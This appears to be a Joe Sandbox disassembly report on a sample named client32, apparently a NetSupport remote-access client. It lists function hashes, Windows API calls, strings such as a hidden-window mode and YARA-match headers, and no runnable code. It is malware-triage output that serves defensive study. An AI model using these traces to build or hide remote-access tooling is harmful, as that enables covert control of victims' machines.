                                                                                • Opcode ID: c3b9e28978103be5a937d48a63f04c3ffe11da8c089b37b84e1aa512a40c65d6
                                                                                • Instruction ID: 2d84ac58a4c57407e54c3cb5711102d4444eebaf719169cc73b89b5b27c55d8a
                                                                                • Opcode Fuzzy Hash: c3b9e28978103be5a937d48a63f04c3ffe11da8c089b37b84e1aa512a40c65d6
                                                                                • Instruction Fuzzy Hash: 8F81C375E00716ABD721CF64CC85F9EB3F4BB88B08F0045ADE5569B680EB74A940CF92
                                                                                APIs
                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                • EnterCriticalSection.KERNEL32(?,View,limitcolorbits,00000000,00000000,1B702977,111F10F8,111E6C98,?), ref: 110B3A64
                                                                                • UnionRect.USER32(?,?,?), ref: 110B3B12
                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 110B3CAD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                 • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeaveRectUnion__wcstoi64
                                                                                • String ID: 8$Client$ScrapeBandwidth$ScrapeBandwidthPeriod$ScrapeBusyDelay$ScrapeNotBusyDelay$ScrapeSkipDelay$View$d$limitcolorbits
                                                                                • API String ID: 3518726166-774679399
                                                                                • Opcode ID: 9ed2b62170dfdd6d390585d58a5c009429d8adca9bb6f56d08ac168bf57d857b
                                                                                • Instruction ID: aebd380d628d0b1599e2b276af2785b4fa2c3b861337a9a0e451ff4e8484ea1a
                                                                                • Opcode Fuzzy Hash: 9ed2b62170dfdd6d390585d58a5c009429d8adca9bb6f56d08ac168bf57d857b
                                                                                • Instruction Fuzzy Hash: AE915A78E04259AFDB44CFA5D980BEDFBF1FB48304F20815AE909AB344D731A841CB98
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(0000017D,1B702977,0000017D,?,?,?,?,?,?,?,?,1118B168,000000FF,?,1110F947,00000001), ref: 1110F427
                                                                                • _memset.LIBCMT ref: 1110F4C2
                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 1110F4FA
                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1110F58E
                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 1110F5B9
                                                                                • WriteFile.KERNEL32(?,PCIR,00000030,?,00000000), ref: 1110F5CE
                                                                                  • Part of subcall function 11110000: InterlockedDecrement.KERNEL32(?), ref: 11110008
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,1118B168,000000FF), ref: 1110F5F5
                                                                                • _free.LIBCMT ref: 1110F628
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 1110F665
                                                                                • timeEndPeriod.WINMM(00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 1110F677
                                                                                • LeaveCriticalSection.KERNEL32(0000017D,?,?,?,?,?,?,?,1118B168,000000FF,?,1110F947,00000001,1B702977,0000017D,00000001), ref: 1110F681
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                 • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseCriticalHandlePointerSectionWrite$DecrementEnterInterlockedLeavePeriod_free_memsettime
                                                                                • String ID: End Record %s$PCIR
                                                                                • API String ID: 4278564793-2672865668
                                                                                • Opcode ID: 2297d0fbe9251eaeeb3cc25f45a368d5b625df3f620643443588fc5d57948bb5
                                                                                • Instruction ID: c7b3bd1ea8319edfd3cc52dfdc755cda258f2b25611d18eaf89bf58ef2166273
                                                                                • Opcode Fuzzy Hash: 2297d0fbe9251eaeeb3cc25f45a368d5b625df3f620643443588fc5d57948bb5
                                                                                • Instruction Fuzzy Hash: 32811875A0070AABD724CFA4C881BEBF7F8FF88704F00492DE66A97240D775A941CB91
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(Wtsapi32.dll,1B702977,1102E747,?,00000000), ref: 110F711B
                                                                                • GetProcAddress.KERNEL32(00000000,WTSQuerySessionInformationA), ref: 110F7179
                                                                                • wsprintfA.USER32 ref: 110F7235
                                                                                • SetLastError.KERNEL32(00000078), ref: 110F7242
                                                                                • wsprintfA.USER32 ref: 110F7267
                                                                                • GetProcAddress.KERNEL32(?,WTSFreeMemory), ref: 110F72A7
                                                                                • SetLastError.KERNEL32(00000078), ref: 110F72BC
                                                                                • FreeLibrary.KERNEL32(?), ref: 110F72D0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                 • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressErrorLastLibraryProcwsprintf$FreeLoad
                                                                                • String ID: %u.%u.%u.%u$%x:%x:%x:%x:%x:%x:%x:%x$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll
                                                                                • API String ID: 856016564-3838485836
                                                                                APIs
                                                                                • SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 11025036
                                                                                • SendMessageA.USER32(?,000000BA,00000000,00000000), ref: 11025049
                                                                                • SendMessageA.USER32(?,000000BB,-00000001,00000000), ref: 1102505A
                                                                                • SendMessageA.USER32(?,000000C1,00000000,00000000), ref: 11025065
                                                                                • SendMessageA.USER32(?,000000C4,-00000001,?), ref: 1102507E
                                                                                • GetDC.USER32(?), ref: 11025085
                                                                                • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 11025095
                                                                                • SelectObject.GDI32(?,00000000), ref: 110250A2
                                                                                • GetTextExtentPoint32A.GDI32(?,00000020,00000001,?), ref: 110250B8
                                                                                • SelectObject.GDI32(?,?), ref: 110250C7
                                                                                • ReleaseDC.USER32(?,?), ref: 110250CF
                                                                                • SetCaretPos.USER32(?,?), ref: 11025111
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessageSend$ObjectSelect$CaretExtentPoint32ReleaseText
                                                                                • String ID:
                                                                                • API String ID: 4100900918-3916222277
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 1101F0FE
                                                                                • SystemParametersInfoA.USER32(00000029,00000000,?,00000000), ref: 1101F11D
                                                                                  • Part of subcall function 110CCE60: GetWindowRect.USER32(110CEFF5,?), ref: 110CCE7C
                                                                                  • Part of subcall function 110CCE60: SetRectEmpty.USER32(?), ref: 110CCE88
                                                                                • DeleteObject.GDI32(00000000), ref: 1101F16C
                                                                                • DeleteObject.GDI32(00000000), ref: 1101F178
                                                                                • CreateFontIndirectA.GDI32(?), ref: 1101F187
                                                                                • CreateFontIndirectA.GDI32(?), ref: 1101F19F
                                                                                • GetMenuItemCount.USER32 ref: 1101F1A7
                                                                                • _memset.LIBCMT ref: 1101F1CF
                                                                                • GetMenuItemInfoA.USER32(?,00000000,00000001,?), ref: 1101F20C
                                                                                • __strdup.LIBCMT ref: 1101F221
                                                                                • SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 1101F279
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InfoItemMenu$CreateDeleteFontIndirectObjectRect_memset$CountEmptyParametersSystemWindow__strdup
                                                                                • String ID: 0$MakeOwnerDraw
                                                                                • API String ID: 1249465458-1190305232
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(ws2_32.dll,00000000,?), ref: 1112B9E6
                                                                                • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 1112BA03
                                                                                • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 1112BA0D
                                                                                • GetProcAddress.KERNEL32(00000000,socket), ref: 1112BA1B
                                                                                • GetProcAddress.KERNEL32(00000000,closesocket), ref: 1112BA29
                                                                                • GetProcAddress.KERNEL32(00000000,WSAIoctl), ref: 1112BA37
                                                                                • FreeLibrary.KERNEL32(00000000), ref: 1112BAAC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$Library$FreeLoad
                                                                                • String ID: WSACleanup$WSAIoctl$WSAStartup$closesocket$socket$ws2_32.dll
                                                                                • API String ID: 2449869053-2279908372
                                                                                APIs
                                                                                  • Part of subcall function 1115BAE0: IsIconic.USER32(?), ref: 1115BB87
                                                                                  • Part of subcall function 1115BAE0: ShowWindow.USER32(?,00000009), ref: 1115BB97
                                                                                  • Part of subcall function 1115BAE0: BringWindowToTop.USER32(?), ref: 1115BBA1
                                                                                • CheckMenuItem.USER32(00000000,000013EB,-00000009), ref: 1102384D
                                                                                • ShowWindow.USER32(?,00000003), ref: 110238D1
                                                                                • LoadMenuA.USER32(00000000,000013A3), ref: 110239FB
                                                                                • GetSubMenu.USER32(00000000,00000000), ref: 11023A09
                                                                                • CheckMenuItem.USER32(00000000,000013EB,?), ref: 11023A29
                                                                                • GetDlgItem.USER32(?,000013B2), ref: 11023A3C
                                                                                • GetWindowRect.USER32(00000000), ref: 11023A43
                                                                                • PostMessageA.USER32(?,00000111,?,00000000), ref: 11023A99
                                                                                • DestroyMenu.USER32(?,?,00000000,00000000,00000102,?,?,?,00000000), ref: 11023AA3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Menu$Window$Item$CheckShow$BringDestroyIconicLoadMessagePostRect
                                                                                • String ID: AddToJournal$Chat
                                                                                • API String ID: 693070851-2976406578
                                                                                APIs
                                                                                  • Part of subcall function 110D0960: __strdup.LIBCMT ref: 110D097A
                                                                                  • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
                                                                                  • Part of subcall function 110D15C0: wvsprintfA.USER32(?,?,1102CC61), ref: 110D15EB
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                • GetLocalTime.KERNEL32(?), ref: 110A1778
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorExitLastLocalMessageProcessTime__strdup_freewsprintfwvsprintf
                                                                                • String ID: %s\$%s\%s$%s_$CLASSID=$IsA()$LESSON=$[JNL] MakeFileName ret %s$\/:*?"<>|$_%04d_%02d_%02d_%02d%02d$_%s$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                • API String ID: 2014016395-1677429133
                                                                                APIs
                                                                                • GetLastError.KERNEL32(?,11139C95,00000000), ref: 11131428
                                                                                • ShowWindow.USER32(00000000,00000000,?,11139C95,00000000), ref: 11131457
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLastShowWindow
                                                                                • String ID: #32770$Client$Hidden$StatusMode$UI.CPP$gUI.hidden_window
                                                                                • API String ID: 3252650109-4091810678
                                                                                • Opcode ID: 0ae299210a7d0d5a262dbccdfbf7f866bd70b7d9559bf6e9f26038e806d2e655
                                                                                • Instruction ID: 1b40a51cdbaebc86ba70b46d463032212dc909346aab7ab50ce078dfded898e8
                                                                                • Opcode Fuzzy Hash: 0ae299210a7d0d5a262dbccdfbf7f866bd70b7d9559bf6e9f26038e806d2e655
                                                                                • Instruction Fuzzy Hash: 2161D571B84325ABE711CF90CC85F69F774E784B29F104129F625AB2C4EBB56940CB84
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(Wtsapi32.dll,1B702977,1102E747,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 110F732D
                                                                                • GetProcAddress.KERNEL32(00000000,WTSQuerySessionInformationA), ref: 110F7372
                                                                                • GetProcAddress.KERNEL32(?,WTSFreeMemory), ref: 110F73C3
                                                                                • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF,?,1102A280), ref: 110F73D8
                                                                                • GetProcAddress.KERNEL32(?,WTSFreeMemory), ref: 110F73FD
                                                                                • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF), ref: 110F7412
                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF), ref: 110F7423
                                                                                • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF,?,1102A280), ref: 110F7440
                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF,?,1102A280), ref: 110F7451
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressErrorLastLibraryProc$Free$Load
                                                                                • String ID: WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll
                                                                                • API String ID: 2188719708-2019804778
                                                                                • Opcode ID: 8f9cdb94902dff30692c8c6071e3b83f8d748f677524ce08c30458c8737fae8d
                                                                                • Instruction ID: 4e6ae02227e90de241cbe6e1e3770e4d50810e342ffe13a4e1f679076b39a632
                                                                                • Opcode Fuzzy Hash: 8f9cdb94902dff30692c8c6071e3b83f8d748f677524ce08c30458c8737fae8d
                                                                                • Instruction Fuzzy Hash: 49511371D4121AEFDB14DFD9D9C5AAEFBF5FB48300F51846AE829E3600DB34A9018B61
                                                                                APIs
                                                                                  • Part of subcall function 11089560: UnhookWindowsHookEx.USER32(?), ref: 11089583
                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 11027914
                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000001F4), ref: 11027983
                                                                                • PostMessageA.USER32(00040310,00000501,00000000,00000000), ref: 110279A0
                                                                                • SetEvent.KERNEL32(00000270), ref: 110279B1
                                                                                • Sleep.KERNEL32(00000032), ref: 110279B9
                                                                                • PostMessageA.USER32(00040310,00000800,00000000,00000000), ref: 110279EE
                                                                                • GetCurrentThreadId.KERNEL32 ref: 11027A1A
                                                                                • GetThreadDesktop.USER32(00000000), ref: 11027A21
                                                                                • SetThreadDesktop.USER32(00000000), ref: 11027A2A
                                                                                • CloseDesktop.USER32(00000000), ref: 11027A35
                                                                                • CloseHandle.KERNEL32(00000428), ref: 11027A75
                                                                                  • Part of subcall function 11110DE0: GetCurrentThreadId.KERNEL32 ref: 11110E76
                                                                                  • Part of subcall function 11110DE0: InitializeCriticalSection.KERNEL32(-00000010,?,11031700,00000001,00000000), ref: 11110E89
                                                                                  • Part of subcall function 11110DE0: InitializeCriticalSection.KERNEL32(111F18F0,?,11031700,00000001,00000000), ref: 11110E98
                                                                                  • Part of subcall function 11110DE0: EnterCriticalSection.KERNEL32(111F18F0,?,11031700), ref: 11110EAC
                                                                                  • Part of subcall function 11110DE0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031700), ref: 11110ED2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Thread$CriticalDesktopEventSection$CloseCreateCurrentInitializeMessagePost$EnterHandleHookMultipleObjectsSleepUnhookWaitWindows_malloc_memsetwsprintf
                                                                                • String ID: Async
                                                                                • API String ID: 3276504616-2933828738
                                                                                • Opcode ID: 6cee38a70aae2f38755eebf98c3c7587f70e735ab38d84b72a1d7921366109c4
                                                                                • Instruction ID: e67d87833e8f5e22c8d898940d2622bc971bcbde67a649a31d645776c06e00d8
                                                                                • Opcode Fuzzy Hash: 6cee38a70aae2f38755eebf98c3c7587f70e735ab38d84b72a1d7921366109c4
                                                                                • Instruction Fuzzy Hash: 1441DF74B427259BE705DFE4C884B6AF7A8BB54718F000178E921DB688EB70A900CB91
                                                                                APIs
                                                                                  • Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                  • Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                  • Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                  • Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                  • Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                                • GetDlgItem.USER32(?,00000472), ref: 1103F557
                                                                                  • Part of subcall function 11160450: SetPropA.USER32(00000000,00000000,00000000), ref: 1116046E
                                                                                  • Part of subcall function 11160450: SetWindowLongA.USER32(00000000,000000FC,1115FE60), ref: 1116047F
                                                                                • wsprintfA.USER32 ref: 1103F5D1
                                                                                • GetSystemMenu.USER32(?,00000000), ref: 1103F5F6
                                                                                • EnableMenuItem.USER32(00000000,0000F060,00000002), ref: 1103F604
                                                                                • SetWindowPos.USER32(00000000,00000001,00000000,00000000,00000000,00000000,00000003), ref: 1103F663
                                                                                • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000003), ref: 1103F692
                                                                                • MessageBeep.USER32(00000000), ref: 1103F696
                                                                                  • Part of subcall function 111457A0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
                                                                                  • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1111025B), ref: 1114584E
                                                                                  • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
